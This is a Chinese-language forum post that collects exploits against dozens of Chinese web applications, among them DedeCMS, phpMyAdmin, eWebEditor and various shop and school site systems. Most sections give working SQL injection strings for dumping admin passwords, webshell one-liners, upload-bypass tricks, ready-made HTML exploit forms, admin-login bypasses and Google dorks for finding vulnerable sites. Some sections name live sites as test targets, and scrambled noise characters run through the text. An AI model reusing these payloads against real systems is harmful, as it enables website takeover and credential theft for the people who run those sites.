0day合集

admin

启航企业建站系统 cookie注入漏洞通杀所有版本

5 l3 \, D# X# W直接上exploit:
( r" T/ e8 M% H7 R( k% ]/ Ajavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
/ Z& s9 Y5 n# X2 K--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Asprain论坛 注册用户 上传图片就可拿到webshell
7 L5 |( T, I9 A. F$ x9 @
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛，一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
1.txt存放你的一句话马 如：<%execute(request("cmd"))%>
0 H6 R2 p: c1 M- ?  y2 x! W2.gif 为一小图片文件，一定要小，比如qq表情图片
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头，但是现在传上去还不行，我接下来就用
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
- l0 d+ v; ]0 m  E  `* f5.q.asp;.gif
google：Powered by Asprain
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" K. I* d3 d* b7 P$ P
: e/ M* }7 L# Z" a3 |2 _ShopNum1全部系统存在上传漏洞。
+ W  @! e5 T) o7 w. [$ ]3 }( g
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
按说明 提示登录后台。。
在后台功能页面->附件管理->附件列表
可以直接上传.aspx 后缀木马
http://demo.shopnum1.com/upload/20110720083822500.aspx
% k6 r1 Z7 H/ O) d# T--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* @# _' C1 Z( ~7 b
" {- A! U. P0 K" L$ r  `& X% T; y牛牛CMS中小企业网站管理系统 上传漏洞
0 `5 K1 P: z  F$ p2 _) F
: W. h; `; k4 t/ O0 q+ ~( V牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
7 o3 a: l/ M. s4 v3 f6 ^后台:admin/login.asp
% ]" q! {. `# E4 [ewebeditor 5.5 Nday
0 k* [3 p& r% J1 S6 mexp:
( v+ x* p0 O& z7 Q" A8 ?$ c4 I/ y" K7 u<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
<input?type=file?name=uploadfile?size=100><br><br>?
2 `# C  J4 t% V2 J" K3 o$ L<input?type=submit?value=upload>?
</form>
ps:先上传小马.
inurl:member/Register.asp 您好，欢迎来到立即注册立即登录设为首页加入收藏
) c4 z3 j$ Q' w9 v/ f$ q
. ^) t, R' ^+ Z& _) q# q* D) t* r--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 f1 o; C. V' x. K& R9 A5 r3 ]* t2 [+ U$ x
YothCMS 遍历目录漏洞
, d. s" d) Q  @8 d' i5 P$ O0 O
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
默认后台:admin/login.asp
遍历目录:
, O* r2 I$ ^, B. H& |! T% Q# @ewebeditor/manage/upload.asp?id=1&dir=../
data:
2 s6 O0 n. w9 l$ Phttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* b: R3 y7 ?2 w1 U% G: @
Net112企业建站系统 1.0

源码简介：
6 I; h+ B3 E( x0 E- n% QNet112企业建站系统，共有：新闻模块，产品模块，案例模块，下载模块，相册模块，招聘模块，自定义模块，友情链接模块 八大模块。
添加管理员：
) _( ^5 @4 r* o/ M; F7 Nhttp://www.0855.tv/admin/admin.asp?action=add&level=2
其实加不加都不是很重要，后台文件都没怎么作验证。
上传路径：
$ [! W  X- y' X: Y+ E: Dhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
: y& U$ }. \0 O' ahttp://www.0855.tv/inc/Upfile.asp?Stype=2
怎么利用自己研究。
遍历目录：
! M" z4 E: j! ]( ^( `http://www.0855.tv/admin/upfile.asp?path=../..
如：
* f+ S3 q% e$ B$ F0 phttp://www.0855.tv/admin/upfile.asp?path=../admin
/ g8 p6 l# O; m) ]9 H1 whttp://www.0855.tv/admin/upfile.asp?path=../data
! I# Y5 |1 |& D3 C--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

4 `" z7 f: s7 H: a: N- l8 O易和阳光购物商城通杀 上传漏洞

前提要求是IIS6.0+asp坏境。
& a; C2 @% Y/ s8 q漏洞文件Iheeo_upfile.asp
- Y: X8 S* o: h3 P! p  ^9 h过滤不严.直接可以iis6.0上传
把ASP木马改成0855.asp;1.gif
3 A3 r; `# X; M# E$ E  ~5 U: \直接放到明小子上传
, T5 `( n" F7 n) P4 R  }Google搜索：inurl:product.asp?Iheeoid=
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

phpmyadmin后台4种拿shell方法

# A2 P& e: N; Q! R* m方法一：
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
1 E" \) l  z( D: M( K* Q----以上同时执行，在数据库: mysql 下创建一个表名为：xiaoma，字段为xiaoma1，导出到E:/wamp/www/7.php
! N3 Q/ r. o, a一句话连接密码：xiaoma
方法二：
7 V) L5 k4 q" x8 @( Q7 f# S2 ~Create TABLE xiaoma (xiaoma1 text NOT NULL);
& Q, v9 z2 x' v4 q! A) l1 S) qInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
+ C7 r: |2 L4 {9 V, `Drop TABLE IF EXISTS xiaoma;
# f, \; [( {& y方法三：
读取文件内容：    select load_file('E:/xamp/www/s.php');
写一句话：select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
cmd执行权限：select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
方法四：
) d, a! b5 W: R9 y* J1 |select load_file('E:/xamp/www/xiaoma.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
( W& u2 ?" [1 F2 V; U然后访问网站目录：http://www.xxxx.com/xiaoma.php?cmd=dir
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

/ N, ]8 p+ A' V6 L. ?& t传信网络独立开发网站源码0day漏洞

后台system/login.asp
进了后台有个ewebeditor
Google 搜索inurl:product1.asp?tyc=
编辑器漏洞默认后台ubbcode/admin_login.asp
数据库ubbcode/db/ewebeditor.mdb
默认账号密码yzm 111111
! g1 D& G% g/ ^6 i
6 x* ?! m3 x" P% Q! y4 b& }拿webshell方法
* a- e- Y+ a  R9 ^3 q" V- R登陆后台点击“样式管理”-选择新增样式
2 M$ |+ Z  ~8 s  j0 C样式名称:scriptkiddies 随便写
路径模式：选择绝对路径
图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
图片类型比如就是我们要上传的ASP木马格式
9 M' ?  y5 J4 ?  J上传路径：/
! z8 e( g! i  x+ N; J; \" B. }图片限制：写上1000 免的上不了我们的asp木马
上传内容不要写
可以提交了
样式增加成功！
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
* }# O; }6 M+ Y5 i, \按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
  F2 n) @7 Y, l' M/ `1 a上ASP木马 回车 等到路径

3 T0 `8 O& L6 R- \+ D后台：system/login.asp
  V$ S* B- L, v9 I9 I( L! ~$ d* ]. W7 IExp:
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
5 [; P5 F* |, l- |: E测试:
& Y1 A& ~4 i" p# H( ihttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
3 P/ X! t# a5 [9 r) Ehttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

- @5 {4 T2 Q! ~# c3 B4 f& M  ffoosun 0day 最新注入漏洞

# t: x' K( M( ]  i漏洞文件：www.xxx.com/user/SetNextOptions.asp
7 b, h6 Y- x4 u8 F4 ]2 N: F, `6 Q利用简单的方法：
暴管理员帐号：
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
暴管理员密码：
  |$ g) j7 Y8 B# [8 H/ ]( shttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 Y, D/ N" t7 A' F) e* _+ B6 c: L
网站程序的版权未知！
! Y! R; s- Q, K" G! _
3 P& b- z1 J% N6 r+ `4 [  P: U默认网站数据库：
www.i0day.com/data/nxnews.mdb
/ |: c9 i0 L: Newebeditor 在线编辑器：
编辑器数据库下载地址：www.i0day.com/ewebeditor/db/ewebeditor.mdb
登录地址：ewebeditor/admin_login.asp
默认密码：admin  admin
登陆后可遍历目录：ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
6 S+ c+ _6 Q8 F" o0 f; f
Sql注入漏洞：
http://www.i0day.com/detail.asp?id=12
2 T! d8 h  _$ V: v7 Yexp:
union select 1,admin,password,4,5,6,7,8 from admin
6 E9 c  w) n. u% a爆出明文帐号/密码

上传漏洞：
后台+upfile.asp
/ g/ E4 @6 z3 N0 W5 [8 R( y如：
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
. E6 q$ c% t9 t5 w0 eshell的地址：网址+后台+成功上传的马
google:inurl:news.asp?lanmuName=
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

4 Y9 {" @4 Z" R( [/ L: s4 kdedecms最新0day利用不进后台直接拿WEBSHELL

* C4 |: Y5 |1 D7 I拿webshell的方法如下：
2 i0 H6 |0 }  \% V( f' b2 w网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell.
前题条件，必须准备好自己的dede数据库，然后插入数据：
8 N. y8 p' D  X6 `$ t& Minsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
7 g% G5 S& J; P, Y- ?" ?
$ q9 u! N3 C' t: t$ `3 O  P再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
8 |- f% O; N$ }5 R<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
) r7 I# B# r& O* Y<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
1 N4 G! B/ G4 b: V% V<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
, A5 h) u$ u- K" i9 r  c<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
, ?6 z7 [' G9 p7 N<script>
function addaction()
3 ?' S( l( D  x{
& o; x% z0 E; `) V( a; Zdocument.QuickSearch.action=document.QuickSearch.doaction.value;
}
, @) {* F& o5 m( H7 B; W7 K</script>
0 k( e# k  _: n$ o- ^5 ^/ `/ S-----------------------------------------------------------------------------------------------------------------------------------------------

dedecms织梦暴最新严重0day漏洞
bug被利用步骤如下：
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面{}上的字母改为当前的验证码，即可直接进入网站后台。
-------------------------------------------------------------------------------------------------------------------------------------------
9 R% S8 M7 F5 i# v& ?! K
多多淘宝客程序上传漏洞
漏洞页面：
admin\upload_pic.php
9 B% k- {0 Z3 V2 Y" g! h# O$ T9 O传送门：
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
PS:copy张图片马 直接  xxx.php 上传抓包地址！
------------------------------------------------------------------------------------------------------------------------------------------------------

: q& v1 d; J: p8 B无忧公司系统ASP专业版后台上传漏洞
漏洞文件 后台上传
/ l- _0 e' k4 f- J% x: Zadmin/uploadPic.asp
漏洞利用 这个漏洞好像是雷池的
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
2 [: D0 h. v) Q9 w- z) A7 F* e等到的webshell路径：
; l" T7 D' S/ G: q4 v9 g" v1 ~/UploadFiles/scriptkiddies.asp;_2.gif
3 O3 r7 X* s, X. X( @" e---------------------------------------------------------------------------------------------------------------------------------------------------
- O3 `# V3 V  ]! E  B! T9 x$ j
3 ^: {( U) h. B, D  u住哪酒店分销联盟系统2010
Search：
inurl:index.php?m=hotelinfo
* H0 }  {! U. M7 Y. J  mhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
  k: \% ?! U& L7 H* W: O6 g8 z$ k6 `默认后台：index.php?m=admin/login
--------------------------------------------------------------------------------------------------------------------------------------------------

- b4 x( c! O. g! b( E/ d/ e5 X3 qinurl:info_Print.asp?ArticleID=
9 A. e# J, B! T: S+ V& B+ g  L后台 ad_login.asp
爆管理员密码：
1 W+ e4 T3 p7 Y! {union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
------------------------------------------------------------------------------------------------------------------------------------------------------------

搜索框漏洞！
: u' T; c5 V& {8 i%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
--------------------------------------------------------------------------------------------------------------------------------------------------------

关键字：
! l  G5 j* f* e& minurl:/reg_TemletSel.asp?step=2
或者
电子商务自助建站--您理想的助手
-------------------------------------------------------------------------------------------------------------------------------------------------

! n' x9 B" l/ l  \6 w9 FiGiveTest 2.1.0注入漏洞
. V# O5 @, e7 {% m* OVersion: <= 2.1.0
# Homepage: http://iGiveTest.com/
8 n* V( ^4 @5 g4 o谷歌关键字: “Powered by iGiveTest”
随便注册一个帐号。然后暴管理员帐号和密码
  r+ j0 Z  R+ _% S/ Y7 z+ Vhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
------------------------------------------------------------------------------------------------------------------------------------------------
2 ]& W7 ^2 w2 u7 ^0 @
CKXP网上书店注入漏洞
% L# z7 j# R& K/ e工具加表:shop_admin 加字段:admin
1 `% m: b, W& ]/ r  J& w- V1 Y后台:admin/login.asp
! u  y7 F& |- k# [8 A) s+ g0 q  Q登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
- J8 W, h/ Z( ~4 Jinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: I$ H; `/ U9 n. f# m  ]2 H) B
段富超个人网站系统留言本写马漏洞
; q& d& a' p" w6 a* Z9 t- R源码下载：http://www.mycodes.net/24/2149.htm
4 o  x7 N$ E' x; t) c* iaddgbook.asp 提交一句话。
连接： http://www.xxxx.tv/date/date3f.asp
% l4 G% z  _* }6 U* b' r2 j1 ^google:为防批量，特略！
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

智有道专业旅游系统v1.0 注入及列目录漏洞
# _- x  [' L8 k9 L& z6 w" X默认后台路径：/admin/login.asp
默认管理员：admin
默认密码：123456
SQL EXP Tset:
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
' b8 w1 [! Q- z------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ewebeditor(PHP) Ver 3.8 本任意文件上传0day
1 K( B" c& p; P& HEXP：
<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multip
, K& v7 f( W# ^; ]# G+ Nart/form-data">
1 y& Z' m0 m. v<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
0 }; t. H6 O! L+ ?/ [9 i( N- L9 eURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
# F: G; ^0 m' D, I5 ]- a4 p' lfile:<input type=file name="uploadfile"><br>
5 T% `6 Y* ^6 _9 }<input type=button value=submit onclick=fsubmit()>
$ o% f& J  ]" E; S+ F</form><br>
5 ?; h% O; u/ ]+ N! t) p, l( {<script>
function fsubmit(){
; q, C- {( p& c8 E# J0 A" d# nform = document.forms[0];
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
alert(form.action);
" i; T9 o% ~( S, ?. jform.submit();
) B7 w7 b9 q) B- m% w, H: J1 J}
+ r- Z* z% @, u3 Z</script>
注意修改里面ewebeditor的名称还有路径。
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* k3 q8 J. W* d( B/ G7 _* |
提交’时提示ip被记录 防注入系统的利用
网址：http://www.xxx.com/newslist.asp?id=122′
提示“你的操作已被记录!”等信息。
+ r' T+ m  [; L+ o( ^利用方法：www.xxx.com/sqlin.asp看是否存在，存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
: Q" ], _  x) Y$ g2 {6 V-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

西部商务网站管理系统 批量拿shell-0day
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
: q& o; O* Y. ^& D: N, q2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 T( p5 l+ s: z; q  m
! |2 {1 s, q  V3 D3 J; x* o' y+ ]+ lJspRun!6.0 论坛管理后台注入漏洞
2 E; A( P4 v9 M  C; I
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
JspRun!6.0
漏洞描述:
: g$ @: f6 ]0 C" X* l! {JspRun!论坛管理后台的export变量没有过滤，直接进入查询语句，导致进行后台，可以操作数据库，获取系统权限。
在处理后台提交的文件中ForumManageAction.java第1940行
1 Q; F- M% n7 p) O5 U: i: a% i) TString export = request.getParameter("export");//直接获取，没有安全过滤
5 y& K" ^: `1 n  Y8 J& e( ^. u) R$ jif(export!=null){
+ k9 e  j& U. G8 E( e) j0 {- S; SList&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语，执行了...
if(styles==null||styles.size()==0){
4 I2 n' I& j* b* H# F- S<*参考
. h3 p  I( Z4 }8 z5 Lnuanfan@gmail.com
8 i) ]" ^* e# Q9 p*> SEBUG安全建议:
6 v% G& G- |7 l9 X" B. `  p: {www.jsprun.net
- r' i; `# Y2 T5 \) Y（1）安全过滤变量export
7 W# L' k: B, G, K（2）在查询语句中使用占位符
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( _& s# h- Z1 K9 g( Y( ~/ s5 I. E  K: V
乌邦图企业网站系统 cookies 注入
) x3 s9 u/ K8 ?3 ^
程序完整登陆后台:/admin/login.asp
; p3 q; x6 }, W4 ^默认登陆帐号:admin 密码:admin888
4 }& Y3 H9 s, T3 e语句：(前面加个空格)
. U  \% z, k* A/ j0 gand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
或者是16个字段：
/ |7 N. u0 R$ q4 x; I- ^1 yand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
爆不出来自己猜字段。
8 Y. e$ D8 w% n, @1 O5 U+ [" ~注入点：http://www.untnt.com/shownews.asp?=88
getshell:后台有备份，上传图片小马。备份名：a.asp 访问 xxx.com/databakup/a.asp
( t1 J4 M  @% V! C: F- Q关键字：
inurl:shownews?asp.id=
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 j. c' d% |: T  O8 p8 U
CKXP网上书店注入漏洞
8 J  m1 V5 `* q: ~0 j  g8 d" P2 ]
8 X) C+ T4 c4 |1 m' A  K工具加表:shop_admin 加字段:admin
& y7 ]$ ]6 v# {# z" u* m后台:admin/login.asp
; X/ Y- ?* o; ]- p登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

YxShop易想购物商城4.7.1版本任意文件上传漏洞
; t- o; f- n. `9 p3 e) z. S5 D
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
跳转到网站根目录上传任意文件。
如果connector.aspx文件被删可用以下exp，copy以下代码另存为html，上传任意文件
5 x& S$ a3 }/ I9 ]& K5 \<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
. M: V! y7 m6 V% @</form>
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

1 v6 i  _7 ^: W5 L9 HSDcms 后台拿webshell
; n0 `5 h) b, ^+ ~) x
第一种方法：
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
第二种方法：
. _# S# N% R4 B% f& r进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型，然后找一个上传的地方直接上传asp文件！ 注：修改文件类型后不能重复点保存！
第三种方法：
7 M! J' R* j3 L4 A  Q3 q8 c. Y* @进入后台-->界面管理-->模板文件管理-->创建文件
文件名写入getshell.ashx
内容写入下面内容：
+ v1 E2 {0 V5 z( P$ }" u. r/====================复制下面的=========================/
<%@ WebHandler Language="C#" Class="Handler" %>
, X9 i, Z8 _' H- Zusing System;
9 @7 f1 P1 E, |+ Wusing System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
# b( z4 @1 }4 \# x8 j+ _5 h" l4 TStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
file1.Flush();
$ c. t6 c$ ^  |  s# ~0 Mfile1.Close();
/ k2 f; K7 d7 `- J& O}
  h, C7 N0 V$ H( ?& F. Kpublic bool IsReusable {
get {
( L3 U+ o( ~- r2 e  Jreturn false;
% K9 y, e& u! n( X. `+ X( M9 w: d6 s}
6 o. A0 B  {( b}
) U9 h$ k" T' y2 j# C}
8 m- Z) v4 B3 N8 Y" M; _/=============================================/
访问这个地址：http://www.xxx.com/skins/2009/getshell.ashx
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; v5 @3 p) T' t. U
( G; C3 }" H  a6 b5 D- {$ ~9 a7 PESCMS网站管理系统0day
" q6 b; P9 f# V
' z  ?( B* E( N! b1 k4 L5 l' c后台登陆验证是通过admin/check.asp实现的

9 P2 }. v% k5 K- Q首先我们打开http://target.com/admin/es_index.html
然后在COOKIE结尾加上
; ESCMS$_SP2=ES_admin=st0p;
; i- p7 W; U3 \7 \# Z修改,然后刷新
$ \+ R: a; p; |+ e进后台了嘎..
! V, S5 j2 d4 [2 I然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL

利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
5 U4 ]. l6 E) s5 G3 @嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
/ y: g% K: c" X4 b( t' P& o8 {存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
( d8 Z! X, h) h- }0 W. R------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

宁志网站管理系统后台无验证漏洞及修复

/ U5 _; K4 j# M- v0 {$ W  p! r4 e网上搜了一下,好像没有发布.如有雷同纯粹巧合!
官方网站:www.ningzhi.net
& X$ w- S% |) ^7 [. \& o学校网站管理系统 V.2011版本
http://down.chinaz.com/soft/29943.htm
* [) A( e9 a4 J0 T8 U其它版本(如:政府版等),自行下载.
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
3 k& I: B% h8 wlogin.asp代码如下:
<%  response.Write"<script language=javascript>alert('登陆成功！请谨慎操作！谢谢！');this.location.href='manage.asp';</script>" %>
# v& X0 A# f: P7 ^' h7 j2 Wmanage.asp代码我就不帖出来了.反正也没验证.
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
, ~7 W3 V' g- G- W+ }: J漏洞利用:
% {( B* Y- d% ]5 [: M. n直接访问http://www.0855.tv/admin/manage.asp
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
# K7 p. q7 \! a) {% b----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

phpmyadmin拿shell的四种方法总结及修复

方法一：
6 ~" A9 J4 Y" C/ }! fCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
+ m# F7 W0 B2 q2 qINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
! p# v6 d( f0 ?----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on
方法二：
读取文件内容：    select load_file('E:/xamp/www/s.php');
! v6 H. c: N5 m: b/ R( X, ^. S: L' {写一句话：    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
cmd执行权限：    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
; e: F6 M# {# b$ o方法三：
. z" G% R% f' C( F9 h/ K* ~JhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
# `! }0 p  a3 B# Q( |$ uselect cmd from study into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS study;
3 n4 S. ?" ~! Z: L) x# c<?php eval($_POST[cmd])?>
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
1 U; X4 z, N" M4 h. y% G+ ~' |8 q9 pINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数： 1
4 s( y( T3 Q9 ~5 M# J, }SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数： 1
" p- X9 t1 W5 G. i7 @$ }; ZDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
方法四：
3 C) Y( @. Y3 D) P% y0 hselect load_file('E:/xamp/www/study.php');
# |  c( M% [" D* nselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
+ i! X0 j7 H" x# }3 {2 `  H" `3 D然后访问网站目录：http://www.2cto.com/study.php?cmd=dir
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
- E- ?: p: x  n: S& \
0 L0 [! Y4 {; q* c- t$ `NO.001中学网站管理系统 Build 110628 注入漏洞
1 D' R! Q0 }) g, `& L4 F0 O0 \' E
7 G4 `4 A; c- _NO.001中学网站管理系统功能模块:
1.管理员资料:网站的基本信息设置（校长邮箱等）,数据库备份,用户管理、部门及权限管理等
